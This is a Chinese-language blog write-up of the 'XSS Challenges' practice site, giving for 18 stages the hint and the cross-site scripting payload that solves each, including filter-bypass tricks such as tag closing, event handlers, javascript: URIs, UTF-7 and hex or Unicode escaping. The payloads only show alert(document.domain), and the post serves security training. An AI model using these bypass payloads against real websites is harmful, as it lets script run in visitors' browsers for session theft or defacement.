<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="XSS,writeup," />





  <link rel="alternate" href="/atom.xml" title="Hello_C技术博客" type="application/atom+xml" />






<meta name="description" content="0x01、前言最近发现了一个挺好玩的XSS练习平台，大家可以没事了玩一玩。至于相关知识，已经在以前的博客上介绍过，大家对于基础可去看看。练习平台、基础知识，好了，不多说，我们开撸">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS Challenges">
<meta property="og:url" content="http://yoursite.com/uncategorized/2016/11/20/XSS-Challenges.html">
<meta property="og:site_name" content="Hello_C技术博客">
<meta property="og:description" content="0x01、前言最近发现了一个挺好玩的XSS练习平台，大家可以没事了玩一玩。至于相关知识，已经在以前的博客上介绍过，大家对于基础可去看看。练习平台、基础知识，好了，不多说，我们开撸">
<meta property="og:image" content="http://i1.piimg.com/567571/a983e7d934a1ae55.png">
<meta property="og:image" content="http://obh1qcqek.bkt.clouddn.com/360%E6%88%AA%E5%9B%BE20161119201515017.jpg">
<meta property="og:image" content="http://p1.bpimg.com/567571/2707925b245610f7.png">
<meta property="og:image" content="http://p1.bqimg.com/567571/d6d387d8b01baf15.png">
<meta property="og:image" content="http://obh1qcqek.bkt.clouddn.com/360%E6%88%AA%E5%9B%BE20161119211206481.jpg">
<meta property="og:image" content="http://obh1qcqek.bkt.clouddn.com/27.jpg">
<meta property="og:image" content="http://obh1qcqek.bkt.clouddn.com/712.jpg">
<meta property="og:image" content="http://obh1qcqek.bkt.clouddn.com/912.jpg">
<meta property="og:updated_time" content="2016-11-20T06:14:38.495Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="XSS Challenges">
<meta name="twitter:description" content="0x01、前言最近发现了一个挺好玩的XSS练习平台，大家可以没事了玩一玩。至于相关知识，已经在以前的博客上介绍过，大家对于基础可去看看。练习平台、基础知识，好了，不多说，我们开撸">
<meta name="twitter:image" content="http://i1.piimg.com/567571/a983e7d934a1ae55.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/uncategorized/2016/11/20/XSS-Challenges.html"/>





  <title>XSS Challenges | Hello_C技术博客</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hello_C技术博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">一个小白的独白！</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/uncategorized/2016/11/20/XSS-Challenges.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Hello_C">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hello_C技术博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">XSS Challenges</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2016-11-20T14:12:56+08:00">
                2016-11-20
              </time>
            

            

            
          </span>

          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/uncategorized/2016/11/20/XSS-Challenges.html#comments" itemprop="discussionUrl">
                  <span class="post-comments-count ds-thread-count" data-thread-key="uncategorized/2016/11/20/XSS-Challenges.html" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="0x01、前言"><a href="#0x01、前言" class="headerlink" title="0x01、前言"></a>0x01、前言</h3><p>最近发现了一个挺好玩的XSS练习平台，大家可以没事了玩一玩。至于相关知识，已经在以前的博客上介绍过，大家对于基础可去看看。<a href="http://xss-quiz.int21h.jp" target="_blank" rel="external">练习平台</a>、<a href="http://zjw.dropsec.xyz/2016/08/05/xss%E5%9F%BA%E7%A1%80/" target="_blank" rel="external">基础知识</a>，好了，不多说，我们开撸<br><a id="more"></a><br><img src="http://i1.piimg.com/567571/a983e7d934a1ae55.png" alt=""></p>
<p>我们要做的就是alert(document.domain)，还有提示，我们只要在搜索框输入即可。<br>我们可以每次都输入一个数字例如123测试下</p>
<h3 id="0x02、具体实现过程"><a href="#0x02、具体实现过程" class="headerlink" title="0x02、具体实现过程"></a>0x02、具体实现过程</h3><p>1、首先输入123测试我们输入存在的位置，查看源代码发现并没有什么标签包尾</p>
<pre><code>&lt;script&gt;alert(document.domain)&lt;/script&gt;
</code></pre><p>第一题比较简单，这样可直接弹出</p>
<p>2、继续先测试，发现被放进了标签里，那么我们首先得闭合标签</p>
<pre><code>&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;&lt;&quot;
</code></pre><p>也可以直接在标签里触发：(单击search输入框)</p>
<pre><code>&quot; onclick=alert(document.domain) value=&quot;asd
</code></pre><p>3、测试发现没有被标签所包含，所以输入最简单的进行                    </p>
<pre><code>&lt;script&gt;alert(document.domain)&lt;/script&gt;
</code></pre><p>发现&lt;&gt;被转义了，<br><img src="http://obh1qcqek.bkt.clouddn.com/360%E6%88%AA%E5%9B%BE20161119201515017.jpg" alt=""></p>
<p>Hint:The input in text box is properly escaped.<br>可以用burp进行抓包，将p2处继续插入,可以弹出               </p>
<pre><code>&lt;script&gt;alert(document.domain)&lt;/script&gt;
</code></pre><p><img src="http://p1.bpimg.com/567571/2707925b245610f7.png" alt=""></p>
<p>4、Hint:invisible input field<br>发现一个隐藏的提交框，复原后进行测试发现p3被标签包围，和2差不多，闭合标签</p>
<pre><code>&quot;&gt;;&lt;script&gt;alert(document.domain);&lt;/script&gt;&lt;&quot;
</code></pre><p><img src="http://p1.bqimg.com/567571/d6d387d8b01baf15.png" alt=""></p>
<p>5、Hint:length limited text box<br>测试还是得闭合标签，并且修改长度<br><img src="http://obh1qcqek.bkt.clouddn.com/360%E6%88%AA%E5%9B%BE20161119211206481.jpg" alt=""></p>
<pre><code>&quot;&gt;;&lt;script&gt;alert(document.domain);&lt;/script&gt;&lt;&quot;
</code></pre><p>6、Hint:event handler attributes</p>
<p>测试发现被标签包围，老套路</p>
<pre><code>&quot;&gt;;&lt;script&gt;alert(document.domain);&lt;/script&gt;&lt;&quot;
</code></pre><p><img src="http://obh1qcqek.bkt.clouddn.com/27.jpg" alt=""><br>发现转义了&gt;&lt;，那么我们可以使用on事件在input内触发</p>
<pre><code>&quot; onclick=alert(document.domain) value=&quot;asd
</code></pre><p>7、Hint:nearly the same… but a bit more tricky.</p>
<p>继续测试，发现这次”和&gt;&lt;都被转义了，真是太可怕了。<br><img src="http://obh1qcqek.bkt.clouddn.com/712.jpg" alt=""></p>
<pre><code>&quot; onclick=alert(document.domain)
</code></pre><p>依然可以，因为第一个符号只是被当成显示的内容所显示出来，换其他字符同样可以得出</p>
<p>8、Hint:the ‘javascript’ scheme.</p>
<p>进行测试发现输入的构造成了一个链接，<br><img src="http://obh1qcqek.bkt.clouddn.com/912.jpg" alt=""><br>使用</p>
<pre><code>javascript:alert(document.domain);
</code></pre><p>当点击这个链接时，会构造出弹框。</p>
<p>9、Hint:UTF-7 XSS<br>必须使用IE 8.0 进行提交可以实现</p>
<pre><code>具体方法：
XSS CODE:  &lt;script&gt;alert(document.domain)&lt;/script&gt;
UTF-7 XSS Encode:  +ADw-script+AD4-alert(document.domain)+ADw-/script+AD4-
</code></pre><p>将 UTF-7 XSS Encode 添上 UTF-7 Bom 让它成为 UTF-7 的编码</p>
<pre><code>+/v8 +ADw-script+AD4-alert(document.domain)+ADw-/script+AD4-
</code></pre><p>Bom 与 Encode 之间有一个空格<br>在bom与encode之间也可以存在其他代码，<br>如：+/v8 just for fun +ADw-script+AD4-alert(’90sec’)+ADw-/script+AD4-<br>如果是POST提交，就可以直接把 UTF-7 编码字符提交出去<br>如果是GET方式，得先把编码字符进行URL转码，因为浏览器会吞掉+号</p>
<p>10、Hint:s/domain//g;<br>提交之后发现过滤了domain，可以进行双写绕过他</p>
<pre><code>&quot; onclick=alert(document.domdomainain) value=&quot;asd
</code></pre><p>11、Hint:s/script/xscript/ig;” and “s/on[a-z]+=/onxxx=/ig;” and “s/style=/stxxx=/ig;</p>
<p>分别输入上面两个常用的发现script转化为xscript、on转换为onxxx</p>
<pre><code>&quot;&gt;&lt;iframe src=&quot;javascr&amp;#09;ipt:alert(document.domain);&quot;&gt;&lt;/iframe&gt;
</code></pre><p>可以弹出，避免使用了script和on</p>
<p>12、Hint:”s/[\x00-\x20\&lt;\&gt;\”\’<br>经过测试，过滤了尖括号、双引号、空格</p>
<pre><code>``onmouseover=alert(document.domain);
</code></pre><p>onmouseover属性在鼠标指针移动到元素上时触发。</p>
<p>13、Hint:style attribute<br>将&lt;&gt;和”进行了转义<br>考察的是CSS样式属性的XSS，在CSS样式中利用expression实现JavaScript中的onmouseover/onmouseout事件</p>
<pre><code>expression(onmouseover=function(){alert(document.domain)})
</code></pre><p>在IE下实现。</p>
<p>14、Hint:s/(url|script|eval|expression)/xxx/ig</p>
<p>正则过滤了这几个敏感数，加入注释符即可绕过</p>
<pre><code>expre/**/ssion(onmouseover=function(){alert(document.domain)})
</code></pre><p>15、Hint:document.write();</p>
<p>对&gt;&lt;进行了编码，而且处在document.write()函数中，可以对&gt;&lt;进行16进制编码</p>
<pre><code>\\x3Cscript\\x3Ealert(document.domain)\\x3C/script\\x3E
</code></pre><p>16、Hint:”document.write();” and “s/\x/\\x/ig;”<br>和15差不多，就是进行了Unicode编码</p>
<pre><code>\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e
</code></pre><p>17、Hint:multi-byte character<br>思路跟php宽字节注入一样，输入某个特殊的字节，吃掉双引号,%A7闭合最后的双引号<br>    1%A7&amp;p2=+onmouseover%3Dalert%28document.domain%29%3B+%A7</p>
<p>18、Hint:us-ascii high bit issue</p>
<pre><code>%A2%BE%BCscript%BEalert(document.domain);%BC/script%BE
</code></pre>
      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    Hello_C
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://yoursite.com/uncategorized/2016/11/20/XSS-Challenges.html" title="XSS Challenges">http://yoursite.com/uncategorized/2016/11/20/XSS-Challenges.html</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/XSS/" rel="tag"><i class="fa fa-tag"></i> XSS</a>
          
            <a href="/tags/writeup/" rel="tag"><i class="fa fa-tag"></i> writeup</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/uncategorized/2016/11/19/SSRF漏洞初探.html" rel="next" title="SSRF漏洞初探">
                <i class="fa fa-chevron-left"></i> SSRF漏洞初探
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/渗透/2016/11/21/渗透测试流程.html" rel="prev" title="渗透测试流程">
                渗透测试流程 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
        
  <div class="bdsharebuttonbox">
    <a href="#" class="bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
    <a href="#" class="bds_douban" data-cmd="douban" title="分享到豆瓣网"></a>
    <a href="#" class="bds_sqq" data-cmd="sqq" title="分享到QQ好友"></a>
    <a href="#" class="bds_qzone" data-cmd="qzone" title="分享到QQ空间"></a>
    <a href="#" class="bds_weixin" data-cmd="weixin" title="分享到微信"></a>
    <a href="#" class="bds_tieba" data-cmd="tieba" title="分享到百度贴吧"></a>
    <a href="#" class="bds_twi" data-cmd="twi" title="分享到Twitter"></a>
    <a href="#" class="bds_fbook" data-cmd="fbook" title="分享到Facebook"></a>
    <a href="#" class="bds_more" data-cmd="more"></a>
    <a class="bds_count" data-cmd="count"></a>
  </div>
  <script>
    window._bd_share_config = {
      "common": {
        "bdText": "",
        "bdMini": "2",
        "bdMiniList": false,
        "bdPic": ""
      },
      "share": {
        "bdSize": "16",
        "bdStyle": "0"
      },
      "image": {
        "viewList": ["tsina", "douban", "sqq", "qzone", "weixin", "twi", "fbook"],
        "viewText": "分享到：",
        "viewSize": "16"
      }
    }
  </script>

<script>
  with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='//bdimg.share.baidu.com/static/api/js/share.js?cdnversion='+~(-new Date()/36e5)];
</script>

      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div class="ds-thread" data-thread-key="uncategorized/2016/11/20/XSS-Challenges.html"
           data-title="XSS Challenges" data-url="http://yoursite.com/uncategorized/2016/11/20/XSS-Challenges.html">
      </div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.gif"
                alt="Hello_C" />
            
              <p class="site-author-name" itemprop="name">Hello_C</p>
              <p class="site-description motion-element" itemprop="description">渗透测试  网络安全   web</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">71</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">23</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/zjwfc" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.dropsec.xyz" title="Drops团队主页" target="_blank">Drops团队主页</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://fgp.dropsec.xyz" title="F.G.PNotes" target="_blank">F.G.PNotes</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://lyx.dropsec.xyz" title="lazy" target="_blank">lazy</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://byd.dropsec.xyz" title="Joy_nick" target="_blank">Joy_nick</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://wkh.dropsec.xyz" title="X加油,未来" target="_blank">X加油,未来</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://jdrops.dropsec.xyz" title="J_Drops" target="_blank">J_Drops</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://lzx.dropsec.xyz" title="凡尘" target="_blank">凡尘</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://cq.dropsec.xyz" title="qiqi" target="_blank">qiqi</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://yunnigu.dropsec.xyz" title="云" target="_blank">云</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://isron.cn" title="Isron" target="_blank">Isron</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://klionsec.github.io" title="klion" target="_blank">klion</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.myh0st.cn" title="信安之路" target="_blank">信安之路</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.te7m.cn" title="周丹" target="_blank">周丹</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01、前言"><span class="nav-number">1.</span> <span class="nav-text">0x01、前言</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02、具体实现过程"><span class="nav-number">2.</span> <span class="nav-text">0x02、具体实现过程</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Hello_C</span>
  
  <span class="site-pv">
   <script src="http://s6.cnzz.com/stat.php?id=1261655448&web_id=1261655448" type="text/javascript"></script>
  </span>
  
  <span id="busuanzi_container_site_pv">
    本站总访问量<span id="busuanzi_value_site_pv"></span>次
  </span>
  <span id="busuanzi_container_site_uv">
    本站访客数<span id="busuanzi_value_site_uv"></span>人次
  </span>
</div>
<!-- time -->
  <div id="show-time">
    <span id="span_dt_dt"></span>
  </div>
  <script>
      function show_date_time() {
        window.setTimeout("show_date_time()", 1000);
        BirthDay = new Date("9/1/2016 15:30:01");
        today = new Date();
        //总时间
        timeold = (today.getTime() - BirthDay.getTime());
        sectimeold = timeold / 1000
        secondsold = Math.floor(sectimeold);
        msPerDay = 24 * 60 * 60 * 1000
        e_daysold = timeold / msPerDay
        daysold = Math.floor(e_daysold);
        e_hrsold = (e_daysold - daysold) * 24;
        hrsold = Math.floor(e_hrsold);
        e_minsold = (e_hrsold - hrsold) * 60;
        minsold = Math.floor((e_hrsold - hrsold) * 60);
        seconds = Math.floor((e_minsold - minsold) * 60);
        span_dt_dt.innerHTML = "本站已安全运行 " + daysold + " 天 " + hrsold + " 小时 " + minsold + " 分 " + seconds + " 秒";
      }
     show_date_time();
  </script>



        







  <div style="display: none;">
    <script src="//s95.cnzz.com/z_stat.php?id=1261655448&web_id=1261655448" language="JavaScript"></script>
  </div>



        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>
  
  <!-- 页面点击小红心 --> 
  <script type="text/javascript" src="/js/src/love.js"></script>
  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  

  
    
  

  <script type="text/javascript">
    var duoshuoQuery = {short_name:"zjwfc"};
    (function() {
      var ds = document.createElement('script');
      ds.type = 'text/javascript';ds.async = true;
      ds.id = 'duoshuo-script';
      ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
      ds.charset = 'UTF-8';
      (document.getElementsByTagName('head')[0]
      || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
  </script>

  
    
    
    <script src="/lib/ua-parser-js/dist/ua-parser.min.js?v=0.7.9"></script>
    <script src="/js/src/hook-duoshuo.js"></script>
  
















  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item=>{
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: false,
        notify: false,
        appId: 'CwxGhh9VgiFuj6LH48704Fac-gzGzoHsz',
        appKey: 'XUfjKkLfgSzMk7icjPaT0SsL',
        placeholder: 'Just go go',
        avatar:'mm',
        guest_info:guest,
        pageSize:'10' || 10,
    });
  </script>



  





  

  

  

  
  

  

  

  

</body>
</html>
